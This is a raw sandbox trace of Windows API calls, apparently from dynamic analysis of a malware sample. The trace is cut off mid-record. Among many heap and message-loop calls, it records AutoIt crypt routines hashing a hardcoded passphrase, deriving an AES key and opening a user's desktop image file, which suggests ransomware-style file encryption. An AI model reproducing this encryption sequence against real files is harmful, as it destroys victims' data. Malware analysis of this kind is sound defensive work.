| out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0132.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.670] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0132.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0132.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0132.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.671] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0132.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0132.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0132.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0132.672] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0132.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0132.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0132.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca940, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0132.674] CloseHandle (hObject=0x2a0) returned 1 [0132.674] FreeLibrary (hLibModule=0x772d0000) returned 1 [0132.674] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0132.674] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\lB o7wz9.bmp", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58235170, ftCreationTime.dwHighDateTime=0x1d5e3d0, ftLastAccessTime.dwLowDateTime=0x4ffd3e60, ftLastAccessTime.dwHighDateTime=0x1d5ebf1, ftLastWriteTime.dwLowDateTime=0x4ffd3e60, ftLastWriteTime.dwHighDateTime=0x1d5ebf1, nFileSizeHigh=0x0, nFileSizeLow=0x6a36, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="lB o7wz9.bmp", cAlternateFileName="LBO7WZ~1.BMP")) returned 0x41ac2c0 [0132.674] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0132.675] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0132.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.675] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0132.675] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0132.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ec8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0132.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0132.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0132.675] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0132.676] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0132.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0132.676] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0132.676] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0132.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0132.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.676] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0132.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0132.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cae68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0132.676] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0132.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0132.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0132.676] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0132.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0132.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0132.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cae50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0132.677] CryptHashData (hHash=0x41ac640, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0132.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.677] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0132.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0132.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cadd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0132.677] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac140) returned 1 [0132.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0132.677] CryptDestroyHash (hHash=0x41ac640) returned 1 [0132.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0132.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0132.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0132.678] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0132.678] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0132.678] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0132.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0132.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eba98 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0132.679] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\lB o7wz9.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\lb o7wz9.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0132.679] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.679] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0132.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0132.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0132.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0132.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0132.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0132.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0132.680] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0132.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0132.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0132.680] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0132.680] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 